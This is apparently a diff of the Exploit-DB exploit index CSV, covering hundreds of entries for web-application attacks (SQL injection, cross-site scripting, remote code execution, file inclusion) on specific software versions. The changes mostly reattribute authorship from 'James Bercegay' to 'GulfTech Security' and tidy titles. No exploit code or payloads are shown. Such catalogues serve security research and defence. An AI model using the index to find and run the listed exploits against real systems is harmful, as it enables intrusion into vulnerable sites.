1078,exploits/php/webapps/1078.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Code Injection",2005-07-01,ilo--,webapps,php,
1080,exploits/php/webapps/1080.pl,"phpBB 2.0.15 - 'highlight' Database Authentication Details",2005-07-03,SecureD,webapps,php,
1082,exploits/php/webapps/1082.pl,"XOOPS 2.0.11 - 'xmlrpc.php' SQL Injection",2005-07-04,RusH,webapps,php,
@ -16223,7 +16230,7 @@ id,file,description,date,author,type,platform,port
1113,exploits/php/webapps/1113.pm,"phpBB 2.0.15 - PHP Remote Code Execution (Metasploit)",2005-07-19,str0ke,webapps,php,
1120,exploits/cgi/webapps/1120.pl,"FtpLocate 2.02 - 'current' Remote Command Execution",2005-07-25,newbug,webapps,cgi,
1133,exploits/php/webapps/1133.pm,"vBulletin 3.0.6 - 'template' Command Execution (Metasploit)",2005-08-03,str0ke,webapps,php,
1134,exploits/php/webapps/1134.pl,"MySQL Eventum 1.5.5 - 'login.php' SQL Injection",2005-08-05,"James Bercegay",webapps,php,
1134,exploits/php/webapps/1134.pl,"MySQL Eventum 1.5.5 - 'login.php' SQL Injection",2005-08-05,"GulfTech Security",webapps,php,
1135,exploits/php/webapps/1135.c,"PHP-Fusion 6.0.106 - BBCode IMG Tag Script Injection",2005-08-05,Easyex,webapps,php,
1140,exploits/php/webapps/1140.php,"Flatnuke 2.5.5 - Remote Code Execution",2005-08-08,rgod,webapps,php,
1142,exploits/php/webapps/1142.php,"WordPress 1.5.1.3 - Remote Code Execution",2005-08-09,Kartoffelguru,webapps,php,
@ -19601,7 +19608,7 @@ id,file,description,date,author,type,platform,port
6258,exploits/php/webapps/6258.txt,"PHPBasket - 'pro_id' SQL Injection",2008-08-17,r45c4l,webapps,php,
6259,exploits/php/webapps/6259.txt,"VidiScript (Avatar) - Arbitrary File Upload",2008-08-18,InjEctOr5,webapps,php,
6260,exploits/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,webapps,php,
6261,exploits/php/webapps/6261.txt,"PHP live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",webapps,php,
6261,exploits/php/webapps/6261.txt,"PHP Live Helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",webapps,php,
6269,exploits/cgi/webapps/6269.txt,"TWiki 4.2.0 - 'configure' Remote File Disclosure",2008-08-19,Th1nk3r,webapps,cgi,
6270,exploits/php/webapps/6270.txt,"Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",webapps,php,
6271,exploits/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",webapps,php,
@ -24280,7 +24287,7 @@ id,file,description,date,author,type,platform,port
15163,exploits/php/webapps/15163.rb,"Joomla! Component JE Directory 1.0 - SQL Injection",2010-09-30,"Easy Laster",webapps,php,
15164,exploits/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",webapps,php,
15165,exploits/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,webapps,php,
15166,exploits/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion",2010-10-01,LiquidWorm,webapps,php,
15166,exploits/php/webapps/15166.txt,"Zen Cart 1.3.9f - 'typefilter' Local File Inclusion",2010-10-01,LiquidWorm,webapps,php,
15169,exploits/php/webapps/15169.txt,"Evaria Content Management System 1.1 - File Disclosure",2010-10-01,"khayeye shotor",webapps,php,
15174,exploits/php/webapps/15174.txt,"Tiki Wiki CMS Groupware 5.2 - Multiple Vulnerabilities",2010-10-01,"John Leitch",webapps,php,
15173,exploits/php/webapps/15173.txt,"phpMyShopping 1.0.1505 - Multiple Vulnerabilities",2010-10-01,Metropolis,webapps,php,
@ -27230,7 +27237,7 @@ id,file,description,date,author,type,platform,port
24420,exploits/asp/webapps/24420.txt,"Web Animations Password Protect - Multiple Input Validation Vulnerabilities",2004-08-31,Criolabs,webapps,asp,
24422,exploits/asp/webapps/24422.txt,"Comersus Cart 5.0 - HTTP Response Splitting",2004-09-01,"Maestro De-Seguridad",webapps,asp,
24424,exploits/php/webapps/24424.txt,"Newtelligence DasBlog 1.x - Request Log HTML Injection",2004-09-01,"Dominick Baier",webapps,php,
24425,exploits/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - Comment Module CM_pid Cross-Site Scripting",2004-09-01,"GulfTech Security",webapps,php,
24425,exploits/php/webapps/24425.txt,"phpWebSite 0.7.3/0.8.x/0.9.x Comment Module - 'CM_pid' Cross-Site Scripting",2004-09-01,"GulfTech Security",webapps,php,
24432,exploits/windows/webapps/24432.txt,"Microsoft Internet Explorer 8/9 - Steal Any Cookie",2013-01-28,"Christian Haider",webapps,windows,
24441,exploits/hardware/webapps/24441.txt,"NETGEAR SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,webapps,hardware,
24508,exploits/php/webapps/24508.txt,"Scripts Genie Gallery Personals - 'gallery.php?L' SQL Injection",2013-02-17,3spi0n,webapps,php,
@ -27325,7 +27332,7 @@ id,file,description,date,author,type,platform,port
24603,exploits/ios/webapps/24603.txt,"Remote File Manager 1.2 iOS - Multiple Vulnerabilities",2013-03-06,Vulnerability-Lab,webapps,ios,
24604,exploits/asp/webapps/24604.txt,"Snitz Forums 2000 - 'down.asp' HTTP Response Splitting",2004-09-16,"Maestro De-Seguridad",webapps,asp,
24611,exploits/cgi/webapps/24611.txt,"YaBB 1.x/9.1.2000 - Administrator Command Execution",2004-09-17,"GulfTech Security",webapps,cgi,
24612,exploits/cgi/webapps/24612.txt,"YaBB 1.x/9.1.2000 - YaBB.pl IMSend Cross-Site Scripting",2004-09-17,"GulfTech Security",webapps,cgi,
24612,exploits/cgi/webapps/24612.txt,"YaBB 1.x/9.1.2000 - 'YaBB.pl IMSend' Cross-Site Scripting",2004-09-17,"GulfTech Security",webapps,cgi,
24613,exploits/php/webapps/24613.txt,"Remository - SQL Injection",2004-09-18,khoaimi,webapps,php,
24614,exploits/php/webapps/24614.txt,"Mambo Open Source 4.5.1 (1.0.9) - Cross-Site Scripting",2004-09-20,"Joxean Koret",webapps,php,
24615,exploits/php/webapps/24615.txt,"Mambo Open Source 4.5.1 (1.0.9) - 'Function.php' Arbitrary Command Execution",2004-09-20,"Joxean Koret",webapps,php,
@ -27403,8 +27410,8 @@ id,file,description,date,author,type,platform,port
24759,exploits/php/webapps/24759.txt,"IPBProArcade 2.5 - SQL Injection",2004-11-20,"axl daivy",webapps,php,
24762,exploits/php/webapps/24762.txt,"PHPKIT 1.6 - Multiple Input Validation Vulnerabilities",2004-11-22,Steve,webapps,php,
24766,exploits/php/webapps/24766.txt,"Nuked-klaN 1.x - Submit Link Function HTML Injection",2004-11-23,XioNoX,webapps,php,
24768,exploits/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module - 'record' SQL Injection",2004-11-23,"James Bercegay",webapps,php,
24769,exploits/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module - Traversal Arbitrary File Access",2004-11-23,"James Bercegay",webapps,php,
24768,exploits/php/webapps/24768.txt,"SugarCRM 1.x/2.0 Module - 'record' SQL Injection",2004-11-23,"GulfTech Security",webapps,php,
24769,exploits/php/webapps/24769.txt,"SugarCRM 1.x/2.0 Module - Traversal Arbitrary File Access",2004-11-23,"GulfTech Security",webapps,php,
24771,exploits/php/webapps/24771.txt,"KorWeblog 1.6.2 - Remote Directory Listing",2004-11-24,"Jeremy Bae",webapps,php,
24772,exploits/php/webapps/24772.txt,"Zwiki 0.10/0.36.2 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",webapps,php,
24773,exploits/jsp/webapps/24773.txt,"JSPWiki 2.1 - Cross-Site Scripting",2004-11-24,"Jeremy Bae",webapps,jsp,
@ -27445,10 +27452,10 @@ id,file,description,date,author,type,platform,port
24838,exploits/asp/webapps/24838.txt,"Active Server Corner ASP Calendar 1.0 - Administrative Access",2004-12-14,"ali reza AcTiOnSpIdEr",webapps,asp,
24840,exploits/asp/webapps/24840.txt,"ASP-Rider - SQL Injection",2004-12-14,"Shervin Khaleghjou",webapps,asp,
24842,exploits/php/webapps/24842.txt,"IWebNegar - Multiple SQL Injections",2004-12-15,"Shervin Khaleghjou",webapps,php,
24844,exploits/php/webapps/24844.txt,"phpGroupWare 0.9.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-15,"James Bercegay",webapps,php,
24845,exploits/php/webapps/24845.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' Cross-Site Scripting",2004-12-15,"James Bercegay",webapps,php,
24846,exploits/php/webapps/24846.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' SQL Injection",2004-12-15,"James Bercegay",webapps,php,
24847,exploits/php/webapps/24847.txt,"phpGroupWare 0.9.x - 'index.php' Multiple SQL Injections",2004-12-15,"James Bercegay",webapps,php,
24844,exploits/php/webapps/24844.txt,"phpGroupWare 0.9.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-15,"GulfTech Security",webapps,php,
24845,exploits/php/webapps/24845.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' Cross-Site Scripting",2004-12-15,"GulfTech Security",webapps,php,
24846,exploits/php/webapps/24846.txt,"phpGroupWare 0.9.x - 'viewticket_details.php?ticket_id' SQL Injection",2004-12-15,"GulfTech Security",webapps,php,
24847,exploits/php/webapps/24847.txt,"phpGroupWare 0.9.x - 'index.php' Multiple SQL Injections",2004-12-15,"GulfTech Security",webapps,php,
24849,exploits/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",webapps,php,
24850,exploits/php/webapps/24850.txt,"WordPress Plugin Simply Poll 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,webapps,php,
24851,exploits/php/webapps/24851.txt,"Joomla! Component com_rsfiles - 'cid' SQL Injection",2013-03-18,ByEge,webapps,php,
@ -27526,8 +27533,8 @@ id,file,description,date,author,type,platform,port
25014,exploits/php/webapps/25014.txt,"WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,webapps,php,
25183,exploits/php/webapps/25183.txt,"ProjectBB 0.4.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"benji lemien",webapps,php,
25024,exploits/hardware/webapps/25024.txt,"D-Link DIR-635 - Multiple Vulnerabilities",2013-04-26,m-1-k-3,webapps,hardware,
25037,exploits/php/webapps/25037.txt,"Kayako eSupport 2.x - 'index.php' Knowledgebase Cross-Site Scripting",2004-12-18,"James Bercegay",webapps,php,
25038,exploits/php/webapps/25038.txt,"Kayako eSupport 2.x - Ticket System Multiple SQL Injections",2004-12-18,"James Bercegay",webapps,php,
25037,exploits/php/webapps/25037.txt,"Kayako eSupport 2.x - 'index.php' Knowledgebase Cross-Site Scripting",2004-12-18,"GulfTech Security",webapps,php,
25038,exploits/php/webapps/25038.txt,"Kayako eSupport 2.x - Ticket System Multiple SQL Injections",2004-12-18,"GulfTech Security",webapps,php,
25041,exploits/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal",2004-12-20,white_e@nogimmick.org,webapps,cgi,
25042,exploits/cgi/webapps/25042.txt,"Tlen.pl 5.23.4.1 - Instant Messenger Remote Script Execution",2004-12-20,"Jaroslaw Sajko",webapps,cgi,
25043,exploits/php/webapps/25043.txt,"phpGroupWare 0.9.14 - 'Tables_Update.Inc.php' Remote File Inclusion",2004-01-27,"Cedric Cochin",webapps,php,
@ -27656,7 +27663,7 @@ id,file,description,date,author,type,platform,port
25252,exploits/asp/webapps/25252.txt,"BetaParticle blog 2.0/3.0 - dbBlogMX.mdb Direct Request Database Disclosure",2005-03-21,"farhad koosha",webapps,asp,
25253,exploits/asp/webapps/25253.txt,"BetaParticle blog 2.0/3.0 - 'upload.asp' Unauthenticated Arbitrary File Upload",2005-03-21,"farhad koosha",webapps,asp,
25254,exploits/asp/webapps/25254.txt,"BetaParticle blog 2.0/3.0 - 'myFiles.asp' Unauthenticated File Manipulation",2005-03-21,"farhad koosha",webapps,asp,
25257,exploits/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-22,"James Bercegay",webapps,php,
25257,exploits/php/webapps/25257.txt,"Kayako ESupport 2.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-22,"GulfTech Security",webapps,php,
25258,exploits/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",webapps,php,
25260,exploits/php/webapps/25260.txt,"Vortex Portal 2.0 - 'index.php?act' Remote File Inclusion",2005-03-23,"Francisco Alisson",webapps,php,
25261,exploits/php/webapps/25261.txt,"Vortex Portal 2.0 - 'content.php?act' Remote File Inclusion",2005-03-23,"Francisco Alisson",webapps,php,
@ -27668,7 +27675,7 @@ id,file,description,date,author,type,platform,port
25267,exploits/php/webapps/25267.txt,"Invision Power Board 1.x/2.0 - HTML Injection",2005-03-23,"Woody Hughes",webapps,php,
25269,exploits/jsp/webapps/25269.txt,"Oracle Reports Server 10g - Multiple Cross-Site Scripting Vulnerabilities",2005-03-24,Paolo,webapps,jsp,
25270,exploits/php/webapps/25270.txt,"Topic Calendar 1.0.1 - 'Calendar_Scheduler.php' Cross-Site Scripting",2004-03-24,"Alberto Trivero",webapps,php,
25271,exploits/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 - 'main.php' Arbitrary PHP Code Execution",2005-03-24,"James Bercegay",webapps,php,
25271,exploits/php/webapps/25271.txt,"Double Choco Latte 0.9.3/0.9.4 - 'main.php' Arbitrary PHP Code Execution",2005-03-24,"GulfTech Security",webapps,php,
25272,exploits/php/webapps/25272.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' Cross-Site Scripting",2005-03-24,mircia,webapps,php,
25273,exploits/php/webapps/25273.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php' SQL Injection",2005-03-24,mircia,webapps,php,
25276,exploits/php/webapps/25276.txt,"PHPMyDirectory 10.1.3 - 'review.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-25,mircia,webapps,php,
@ -27685,7 +27692,7 @@ id,file,description,date,author,type,platform,port
25299,exploits/php/webapps/25299.txt,"Tkai's Shoutbox - 'Query' Open Redirection",2005-03-28,CorryL,webapps,php,
25300,exploits/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",webapps,php,
25301,exploits/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",webapps,php,
25302,exploits/php/webapps/25302.txt,"PHPCOIN 1.2 - 'auxpage.php?page' Traversal Arbitrary File Access",2005-03-29,"James Bercegay",webapps,php,
25302,exploits/php/webapps/25302.txt,"phpCoin 1.2 - 'auxpage.php?page' Traversal Arbitrary File Access",2005-03-29,"GulfTech Security",webapps,php,
25304,exploits/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,webapps,php,
25305,exploits/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,webapps,multiple,
33406,exploits/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",webapps,php,
@ -27742,9 +27749,9 @@ id,file,description,date,author,type,platform,port
25372,exploits/php/webapps/25372.txt,"RadScripts RadBids Gold 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-04-09,Dcrab,webapps,php,
25373,exploits/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' Cross-Site Scripting",2005-04-09,kre0n,webapps,php,
25374,exploits/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' SQL Injection",2005-04-09,kre0n,webapps,php,
25376,exploits/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion",2005-04-10,"James Bercegay",webapps,php,
25377,exploits/php/webapps/25377.txt,"ModernGigabyte ModernBill 4.3 - 'C_CODE' Cross-Site Scripting",2005-04-11,"James Bercegay",webapps,php,
25378,exploits/php/webapps/25378.txt,"ModernGigabyte ModernBill 4.3 - 'Aid' Cross-Site Scripting",2005-04-11,"James Bercegay",webapps,php,
25376,exploits/php/webapps/25376.txt,"ModernGigabyte ModernBill 4.3 - 'news.php' File Inclusion",2005-04-10,"GulfTech Security",webapps,php,
25377,exploits/php/webapps/25377.txt,"ModernGigabyte ModernBill 4.3 - 'C_CODE' Cross-Site Scripting",2005-04-11,"GulfTech Security",webapps,php,
25378,exploits/php/webapps/25378.txt,"ModernGigabyte ModernBill 4.3 - 'Aid' Cross-Site Scripting",2005-04-11,"GulfTech Security",webapps,php,
25379,exploits/php/webapps/25379.txt,"Zoom Media Gallery 2.1.2 - 'index.php' SQL Injection",2005-04-11,"Andreas Constantinides",webapps,php,
25380,exploits/php/webapps/25380.txt,"Invision Power Board 1.x - 'ST' SQL Injection",2005-04-11,Dcrab,webapps,php,
25381,exploits/php/webapps/25381.txt,"WebCT Discussion Board 4.1 - HTML Injection",2005-04-11,lacertosum,webapps,php,
@ -27850,8 +27857,8 @@ id,file,description,date,author,type,platform,port
25529,exploits/asp/webapps/25529.txt,"StorePortal 2.63 - 'default.asp' Multiple SQL Injections",2005-04-25,Dcrab,webapps,asp,
25530,exploits/asp/webapps/25530.txt,"OneWorldStore - IDOrder Information Disclosure",2005-04-25,Lostmon,webapps,asp,
25531,exploits/php/webapps/25531.html,"PHPMyVisites 1.3 - 'Set_Lang' File Inclusion",2005-04-26,"Max Cerny",webapps,php,
25532,exploits/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Remote File Inclusion",2005-04-24,"James Bercegay",webapps,php,
25533,exploits/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Cross-Site Scripting",2005-04-24,"James Bercegay",webapps,php,
25532,exploits/php/webapps/25532.txt,"Yappa-ng 1.x/2.x - Remote File Inclusion",2005-04-24,"GulfTech Security",webapps,php,
25533,exploits/php/webapps/25533.txt,"Yappa-ng 1.x/2.x - Cross-Site Scripting",2005-04-24,"GulfTech Security",webapps,php,
25534,exploits/php/webapps/25534.txt,"SqWebMail 3.x/4.0 - HTTP Response Splitting",2005-04-15,Zinho,webapps,php,
25535,exploits/php/webapps/25535.txt,"Invision Power Board 2.0.1 - 'QPid' SQL Injection",2005-04-26,SVT,webapps,php,
25536,exploits/asp/webapps/25536.txt,"MetaCart E-Shop V-8 - 'IntProdID' SQL Injection",2005-04-26,Dcrab,webapps,asp,
@ -27872,7 +27879,7 @@ id,file,description,date,author,type,platform,port
25553,exploits/php/webapps/25553.txt,"Claroline E-Learning 1.5/1.6 - 'exercises_details.php?exo_id' SQL Injection",2005-04-27,"Sieg Fried",webapps,php,
25555,exploits/php/webapps/25555.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php?P' SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",webapps,php,
25556,exploits/php/webapps/25556.txt,"Dream4 Koobi CMS 4.2.3 - 'index.php?Q' SQL Injection",2005-04-27,"CENSORED Search Vulnerabilities",webapps,php,
25558,exploits/php/webapps/25558.txt,"Notes Module for phpBB - SQL Injection",2005-04-28,"James Bercegay",webapps,php,
25558,exploits/php/webapps/25558.txt,"phpBB Notes Module - SQL Injection",2005-04-28,"GulfTech Security",webapps,php,
25560,exploits/php/webapps/25560.txt,"Just William's Amazon Webstore - 'Closeup.php?Image' Cross-Site Scripting",2005-04-28,Lostmon,webapps,php,
25564,exploits/php/webapps/25564.txt,"Just William's Amazon Webstore - 'CurrentIsExpanded' Cross-Site Scripting",2005-04-28,Lostmon,webapps,php,
25565,exploits/php/webapps/25565.txt,"Just William's Amazon Webstore - 'searchFor' Cross-Site Scripting",2005-04-28,Lostmon,webapps,php,
@ -27893,8 +27900,8 @@ id,file,description,date,author,type,platform,port
25587,exploits/asp/webapps/25587.txt,"Maxwebportal 1.3 - 'pic_popular.asp' SQL Injection",2005-05-02,s-dalili,webapps,asp,
25588,exploits/asp/webapps/25588.txt,"Maxwebportal 1.3 - 'dl_toprated.asp' SQL Injection",2005-05-02,s-dalili,webapps,asp,
25589,exploits/asp/webapps/25589.txt,"Maxwebportal 1.3 - 'custom_link.asp' Multiple SQL Injections",2005-05-02,s-dalili,webapps,asp,
25590,exploits/php/webapps/25590.txt,"osTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities",2005-05-03,"James Bercegay",webapps,php,
25591,exploits/php/webapps/25591.txt,"SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities",2005-05-03,"James Bercegay",webapps,php,
25590,exploits/php/webapps/25590.txt,"osTicket 1.2/1.3 - Multiple Input Validation / Remote Code Injection Vulnerabilities",2005-05-03,"GulfTech Security",webapps,php,
25591,exploits/php/webapps/25591.txt,"SitePanel2 2.6.1 - Multiple Input Validation Vulnerabilities",2005-05-03,"GulfTech Security",webapps,php,
25592,exploits/cgi/webapps/25592.txt,"WebCrossing WebX 5.0 - Cross-Site Scripting",2005-05-03,dr_insane,webapps,cgi,
25593,exploits/php/webapps/25593.txt,"Invision Power Board 2.0.3/2.1 - 'Act' Cross-Site Scripting",2005-05-03,"arron ward",webapps,php,
25594,exploits/cgi/webapps/25594.txt,"Gossamer Threads Links 2.x - 'User.cgi' Cross-Site Scripting",2005-05-04,"Nathan House",webapps,cgi,
@ -27964,7 +27971,7 @@ id,file,description,date,author,type,platform,port
25679,exploits/php/webapps/25679.txt,"JGS-Portal 3.0.1/3.0.2 - 'jgs_portal_sponsor.php?id' SQL Injection",2005-05-16,deluxe@security-project.org,webapps,php,
25681,exploits/php/webapps/25681.php,"Fusionphp Fusion News 3.3/3.6 - X-Forworded-For PHP Script Code Injection",2005-05-24,"Network security team",webapps,php,
25682,exploits/php/webapps/25682.txt,"WordPress 1.5 - 'post.php' Cross-Site Scripting",2005-05-17,"Thomas Waldegger",webapps,php,
25683,exploits/php/webapps/25683.txt,"Help Center Live 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",webapps,php,
25683,exploits/php/webapps/25683.txt,"HelpCenter Live! 1.0/1.2.x - Multiple Input Validation Vulnerabilities",2005-05-24,"GulfTech Security",webapps,php,
25685,exploits/jsp/webapps/25685.txt,"Sun JavaMail 1.3 - API MimeMessage Infromation Disclosure",2005-05-19,"Ricky Latt",webapps,jsp,
25686,exploits/php/webapps/25686.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Inclusion",2005-05-19,"Ingvar Gilbert",webapps,php,
25689,exploits/php/webapps/25689.txt,"EJ3 TOPo 2.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2003-05-20,Lostmon,webapps,php,
@ -28025,7 +28032,7 @@ id,file,description,date,author,type,platform,port
25772,exploits/php/webapps/25772.txt,"Qualiteam X-Cart 4.0.8 - 'register.php?mode' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php,
25773,exploits/php/webapps/25773.txt,"Qualiteam X-Cart 4.0.8 - 'search.php?mode' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php,
25774,exploits/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 - 'giftcert.php' Multiple SQL Injections",2005-05-30,"CENSORED Search Vulnerabilities",webapps,php,
25819,exploits/php/webapps/25819.txt,"FusionBB 0.x - Multiple Input Validation Vulnerabilities",2005-06-13,"James Bercegay",webapps,php,
25819,exploits/php/webapps/25819.txt,"FusionBB 0.x - Multiple Input Validation Vulnerabilities",2005-06-13,"GulfTech Security",webapps,php,
33411,exploits/php/webapps/33411.txt,"iSupport 1.8 - 'ticket_function.php' Multiple Cross-Site Scripting Vulnerabilities",2009-12-16,"Stink & Essandre",webapps,php,
33412,exploits/php/webapps/33412.txt,"iSupport 1.8 - 'index.php?which' Cross-Site Scripting",2009-12-16,"Stink & Essandre",webapps,php,
33413,exploits/php/webapps/33413.txt,"Pluxml-Blog 4.2 - '/core/admin/auth.php' Cross-Site Scripting",2009-12-17,Metropolis,webapps,php,
@ -28063,8 +28070,8 @@ id,file,description,date,author,type,platform,port
25803,exploits/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",webapps,php,
25804,exploits/asp/webapps/25804.txt,"Loki Download Manager 2.0 - 'default.asp' SQL Injection",2005-06-08,hack_912,webapps,asp,
25805,exploits/asp/webapps/25805.txt,"Loki Download Manager 2.0 - 'Catinfo.asp' SQL Injection",2005-06-08,hack_912,webapps,asp,
25806,exploits/php/webapps/25806.txt,"Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection",2005-06-09,"James Bercegay",webapps,php,
25808,exploits/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"James Bercegay",webapps,php,
25806,exploits/php/webapps/25806.txt,"Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection",2005-06-09,"GulfTech Security",webapps,php,
25808,exploits/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"GulfTech Security",webapps,php,
25810,exploits/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Traversals",2013-05-29,"Adam Simuntis",webapps,hardware,
25811,exploits/hardware/webapps/25811.py,"YeaLink IP Phone Firmware 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,webapps,hardware,
25812,exploits/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",webapps,hardware,
@ -28081,7 +28088,7 @@ id,file,description,date,author,type,platform,port
25834,exploits/php/webapps/25834.txt,"ATutor 1.4.3 - 'Directory.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,webapps,php,
25838,exploits/php/webapps/25838.pl,"Ultimate PHP Board 1.8/1.9 - Weak Password Encryption",2005-06-16,"Alberto Trivero",webapps,php,
25839,exploits/asp/webapps/25839.txt,"Cool Cafe Chat 1.2.1 - 'login.asp' SQL Injection",2005-06-16,"Morning Wood",webapps,asp,
25840,exploits/php/webapps/25840.txt,"osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities",2005-06-17,"James Bercegay",webapps,php,
25840,exploits/php/webapps/25840.txt,"osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities",2005-06-17,"GulfTech Security",webapps,php,
25843,exploits/asp/webapps/25843.txt,"Ublog Reload 1.0.5 - 'index.asp' Multiple SQL Injections",2005-06-20,"Dedi Dwianto",webapps,asp,
25844,exploits/asp/webapps/25844.txt,"Ublog Reload 1.0.5 - 'blog_comment.asp?y' SQL Injection",2005-06-20,"Dedi Dwianto",webapps,asp,
25845,exploits/asp/webapps/25845.txt,"UApplication Ublog Reload 1.0.5 - 'Trackback.asp' Cross-Site Scripting",2005-06-20,"Dedi Dwianto",webapps,asp,
@ -28093,9 +28100,9 @@ id,file,description,date,author,type,platform,port
26290,exploits/cgi/webapps/26290.txt,"PerlDiver 2.31 - 'Perldiver.cgi' Cross-Site Scripting",2005-08-21,"Donnie Werner",webapps,cgi,
26291,exploits/asp/webapps/26291.txt,"Mall23 - 'AddItem.asp' SQL Injection",2005-08-21,SmOk3,webapps,asp,
25853,exploits/asp/webapps/25853.txt,"I-Gallery - Folder Argument Directory Traversal",2005-06-20,"Seyed Hamid Kashfi",webapps,asp,
25854,exploits/php/webapps/25854.txt,"PAFaq - Question Cross-Site Scripting",2005-06-20,"James Bercegay",webapps,php,
25854,exploits/php/webapps/25854.txt,"PAFaq - Question Cross-Site Scripting",2005-06-20,"GulfTech Security",webapps,php,
25855,exploits/asp/webapps/25855.txt,"I-Gallery - Folder Argument Cross-Site Scripting",2005-06-20,"Seyed Hamid Kashfi",webapps,asp,
25856,exploits/php/webapps/25856.txt,"PAFaq - Administrator 'Username' SQL Injection",2005-06-20,"James Bercegay",webapps,php,
25856,exploits/php/webapps/25856.txt,"PAFaq - Administrator 'Username' SQL Injection",2005-06-20,"GulfTech Security",webapps,php,
25857,exploits/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",webapps,php,
25858,exploits/asp/webapps/25858.txt,"DUware DUportal 3.4.3 Pro - Multiple SQL Injections",2005-06-22,"Dedi Dwianto",webapps,asp,
25859,exploits/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",webapps,php,
@ -28134,13 +28141,13 @@ id,file,description,date,author,type,platform,port
25893,exploits/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 - 'line.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,webapps,php,
25894,exploits/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 - 'in.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,webapps,php,
25895,exploits/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 - 'enter.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,webapps,php,
25897,exploits/php/webapps/25897.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection",2005-06-24,"James Bercegay",webapps,php,
